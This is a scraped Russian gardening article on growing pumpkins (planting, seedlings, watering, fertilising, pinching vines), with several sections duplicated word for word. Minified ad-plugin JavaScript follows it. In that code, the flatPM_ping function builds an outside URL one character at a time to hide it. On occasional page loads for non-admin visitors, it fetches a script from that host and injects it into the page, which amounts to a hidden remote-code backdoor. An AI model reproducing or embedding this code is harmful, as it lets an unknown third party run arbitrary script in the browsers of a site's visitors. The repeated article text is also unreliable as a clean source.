Являясь растением влаголюбивым, на что указывает ее разросшаяся корневая система и крупные листья, тыква нуждается в больших объемах полива. Высасывая влагу из почвы, она тут же испаряет ее через листья, тем самым обеспечивая себе комфортные условия парника в системе собственного куста. Это необходимо растению для формирования женских соцветий. Эти соцветия не переносят зной и сухость. Поэтому особенное внимание поливу необходимо уделить в период цветения тыквы.

Вода, используемая для полива, не должна быть ниже +20С. Не поливают тыкву водой из источников или артезианской скважины, так как холодная вода способна уничтожить растение. Перед поливом необходимо взрыхлить почву на глубину до 10-12 см, не повреждая при этом верхнюю часть корневой системы, а также удалить сорняки.

Обязательные подкормки тыквы, не считая внесения органики при посадке, желательно провести два раза:

  • Первая подкормка — при появлении трех или пяти настоящих листьев. В грунт вносят нитрофоску в количестве 10 гр на куст в сухом виде.
  • Вторая подкормка — в самом начале образования плетей с внесением нитрофоски, растворенной в воде, в количестве 15 гр на куст растения.

Дополнительно можно подкормить тыкву золой и зольными элементами из расчета 1 стакан на куст. Также не повредит подкормка раствором коровяка из расчета 1:8. Вносится по одному ведру на 5-6 кустов в начале вегетационного периода и по одному ведру на 3 растения в период созревания плодов.

Формирование куста: прищипывание, пасынкование

Правильное формирование растения включает в себя понятия пасынкования и прищипывания. Пасынкованием называют удаление лишних пазушных побегов. Их лучше удалять молодыми не длиннее 7 см. У кустовой тыквы первый плод формируется на основном побеге, его можно прищепить, чтобы не рос дальше, а сосредоточился на выращивании этого плода. Все время, пока куст растет, его нужно прореживать, убирая лишние побеги, куст не должен быть очень густым. Опытные огородники контролируют количество плодов.

Тыкву культивируют кустовую и плетистую. Особенность длинноплетистых сортов заключается в их быстром росте. Чем питательнее почва, тем больше плетей нарастает. Если хозяин хочет много плодов, а их размер его не интересует, то он раскладывает плети так, чтобы они не мешали друг другу, не закрывали солнце, убирает лишние листья. Плети присыпают влажным грунтом, тогда они дают дополнительные корни, что делает их устойчивее и дает дополнительное питание. Только в этом и заключается формирование растения.

Если вы не уверены, что тыквы вызреют до холодов или хотите повлиять на количество плодов, в обоих случаях нужно сделать прищипывание. Его цель – остановить рост плети. На основной плети позволяют завязаться 3-4 плодам, после последнего отсчитывают 5 листочков и отщипывают почку роста. С боковыми побегами делают то же самое.Количество боковых плетей ограничивают раньше, если есть такое желание: когда из нескольких побегов можно выделить пару самых сильных после основного, их оставляют, а остальные удаляют. Это позволяет растению (или заставляет его) направить все силы на вызревание плодов. Дальнейший уход, тоже направленный к одной цели, помогает достичь желаемого результата.

Прищипывание поможет и в том случае, если дачник хочет вырастить много плодов на одном растении. В таком случае еще раньше прекращают рост основной плети – после 1-2 завязей, это стимулирует образование боковых, на которых обычно бывает больше женских цветков, а значит, при определенном уходе получится больше плодов.

Подитожим: чтобы вырастить качественный урожай тыквы в условиях собственного огорода, необходимыми условиями являются: правильная посадка растения, тщательный полив, своевременная подкормка и формирование куста для регулирования плодоношения. Впрочем, все зависит от ваших целей. Вегетационный период тыквы длится около трех месяцев. За 90 дней, не прилагая больших усилий и трудоемких операций, можно вырастить на своем участке вкусный и полезный продукт.

Основы выращивания большой вкусной тыквы

Редкий огородник не выращивает тыквы. Даже если человек по какой-то причине не употребляет в пищу этот полезный во всех отношениях продукт, то садит рядок — другой на корм домашним животным. Поговорим об особенностях выращивания тыквы в открытом грунте и рассадным способом.

Из статьи вы узнаете:

посадка тывквы: почва и размещение

Хотя тыква — наиболее холодоустойчива среди бахчевых овощей, она тоже любит тепло. Поэтому семена этой культуры нужно высаживать в конце апреля — в начале мая, когда почва прогреется и установится стойкая погода. Растет она практически на любой почве с достаточным количеством питательных веществ. Однако лучшими являются супесчаные, легкосуглинковые плодородные земли с нейтральной реакцией (только не засоленные или переувлажненные).

Выбирая участок, обязательно учитывайте предшествующие культуры. Лучшие из них — капуста, картофель, томаты, кормовые и столовые свеклы, зерновые и зернобобовые культуры, однолетние кормовые травы. Размещение после кабачков, патиссонов, огурцов недопустимо. Кстати, тыкву можно посадить там, где собран ранний урожай редиса, шпината, салата.

Соседями тыкв часто становятся картофель, кормовая свекла. Садят их и возле кукурузы, кустовой фасоли. В конце концов, неплохо чувствуют себя тыквы даже возле изгороди, ведь для них практически нет разницы между освещенными и затененными участками.

Чтобы тыквы были большими

Чтобы вырастить большие плоды, прежде всего отберите качественный репродуктивный материал. Целесообразнее использовать 3-летние семена. Предварительно их на протяжении 6-8 суток прогревают на солнце. Затем зернам следует прорасти: на сутки замочите их в воде комнатной температуры, а потом неделю держите в теплом месте. Высаживание проводят тогда, когда температура почвы на глубине 10 см будет в пределах + 13-14″С (если земля будет холоднее — семена загниют).

Эффективнее всего садить тыквы гнездовым методом, размещая растения на расстоянии 70-140 см (в зависимости от сорта). При малой площади питания плоды будут мелкими.

Выкопав ямку, внесите в нее 2-3 кг перегноя и стакан золы. Все это тщательно перемешайте с почвой. Если же земля сухая, в ямку предварительно нужно влить 1-2 л теплой воды. Затем вбросьте 3-5 семян (на расстоянии 3-4 см одно от другого). Глубина заворачивания — 5-6 см. Поверхность слегка уплотните и замульчуйте торфом или перегноем.

Сразу после появления первых всходов проводят неглубокое рыхление междурядий (на 5-6 см). Через 10-15 дней можно повторить процедуру, прорыхлив почву чуть глубже. Так вы притормозите сорняки и обеспечите обогащение почвы вокруг растений кислородом. В фазе первого настоящего листка посевы прореживают, оставляя 1-2 наиболее развитые растения.

Выращивание тыквы через рассаду

Практикуется и выращивание тыкв рассадным способом. Особенно это целесообразно в северных районах с коротким вегетационным периодом. В таком случае овощи получают возможность созреть. Также можете попробовать вырастить тыкву через рассаду, если хотите получить ее к столу как можно раньше.

Рассада тыкв плохо переносит пересаживание. Поэтому ее нужно выращивать без пикирования. Перед посевом заранее замоченные семена нужно выдержать во влажных опилках или песке, пока не появятся небольшие корешки. Затем по одному зернышку высаживайте в наполненные почвенной смесью горшки размером 8×8 см. Глубина посева — 2-3 см.

Выращивание тыквы через рассаду

В такой таре растения выращивают до появления 3-4 настоящих листочков. Увлажняйте только теплой водой, следя, чтобы не пересыхала земля. Через 18-20 дней рассада будет готова к “переселению” на огород, которое в холодных районах проводится в начале июня.

Высаживают рассаду на удобренный перегноем участок. Делать это лучше во время пасмурной погоды. Предварительно лунки щедро полейте. Важно, чтобы земля была плотно прижата к корням, иначе могут образоваться пустоты, которые будут препятствовать доступу воды к растению. Заметим, что рассаду размещают глубже, чем она росла в горшках (вплоть до семядольных листков). Тогда тыквы будут образовывать много дополнительных корней.

Дальнейший уход за тыквой

Тыква очень неприхотлива. Часто весь уход за ней огородники ограничивают посадкой, пуская полив и остальное на волю природы. При этом тыква в отличие от других бахчевых вполне неплохо растет. Но если уделить растению побольше внимания, она отблагодарит сторицей!

Основной уход за тыквой после посадки заключается в поливе, подкормке и, по желанию, в формировании куста. При выращивании кормовой тыквы формирование можно пропустить.

Полив и подкормка

Являясь растением влаголюбивым, на что указывает ее разросшаяся корневая система и крупные листья, тыква нуждается в больших объемах полива. Высасывая влагу из почвы, она тут же испаряет ее через листья, тем самым обеспечивая себе комфортные условия парника в системе собственного куста. Это необходимо растению для формирования женских соцветий. Эти соцветия не переносят зной и сухость. Поэтому особенное внимание поливу необходимо уделить в период цветения тыквы.

Вода, используемая для полива, не должна быть ниже +20С. Не поливают тыкву водой из источников или артезианской скважины, так как холодная вода способна уничтожить растение. Перед поливом необходимо взрыхлить почву на глубину до 10-12 см, не повреждая при этом верхнюю часть корневой системы, а также удалить сорняки.

Обязательные подкормки тыквы, не считая внесения органики при посадке, желательно провести два раза:

  • Первая подкормка — при появлении трех или пяти настоящих листьев. В грунт вносят нитрофоску в количестве 10 гр на куст в сухом виде.
  • Вторая подкормка — в самом начале образования плетей с внесением нитрофоски, растворенной в воде, в количестве 15 гр на куст растения.

Дополнительно можно подкормить тыкву золой и зольными элементами из расчета 1 стакан на куст. Также не повредит подкормка раствором коровяка из расчета 1:8. Вносится по одному ведру на 5-6 кустов в начале вегетационного периода и по одному ведру на 3 растения в период созревания плодов.

Формирование куста: прищипывание, пасынкование

Правильное формирование растения включает в себя понятия пасынкования и прищипывания. Пасынкованием называют удаление лишних пазушных побегов. Их лучше удалять молодыми не длиннее 7 см. У кустовой тыквы первый плод формируется на основном побеге, его можно прищепить, чтобы не рос дальше, а сосредоточился на выращивании этого плода. Все время, пока куст растет, его нужно прореживать, убирая лишние побеги, куст не должен быть очень густым. Опытные огородники контролируют количество плодов.

Тыкву культивируют кустовую и плетистую. Особенность длинноплетистых сортов заключается в их быстром росте. Чем питательнее почва, тем больше плетей нарастает. Если хозяин хочет много плодов, а их размер его не интересует, то он раскладывает плети так, чтобы они не мешали друг другу, не закрывали солнце, убирает лишние листья. Плети присыпают влажным грунтом, тогда они дают дополнительные корни, что делает их устойчивее и дает дополнительное питание. Только в этом и заключается формирование растения.

Если вы не уверены, что тыквы вызреют до холодов или хотите повлиять на количество плодов, в обоих случаях нужно сделать прищипывание. Его цель – остановить рост плети. На основной плети позволяют завязаться 3-4 плодам, после последнего отсчитывают 5 листочков и отщипывают почку роста. С боковыми побегами делают то же самое.Количество боковых плетей ограничивают раньше, если есть такое желание: когда из нескольких побегов можно выделить пару самых сильных после основного, их оставляют, а остальные удаляют. Это позволяет растению (или заставляет его) направить все силы на вызревание плодов. Дальнейший уход, тоже направленный к одной цели, помогает достичь желаемого результата.

Прищипывание поможет и в том случае, если дачник хочет вырастить много плодов на одном растении. В таком случае еще раньше прекращают рост основной плети – после 1-2 завязей, это стимулирует образование боковых, на которых обычно бывает больше женских цветков, а значит, при определенном уходе получится больше плодов.

Подитожим: чтобы вырастить качественный урожай тыквы в условиях собственного огорода, необходимыми условиями являются: правильная посадка растения, тщательный полив, своевременная подкормка и формирование куста для регулирования плодоношения. Впрочем, все зависит от ваших целей. Вегетационный период тыквы длится около трех месяцев. За 90 дней, не прилагая больших усилий и трудоемких операций, можно вырастить на своем участке вкусный и полезный продукт.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};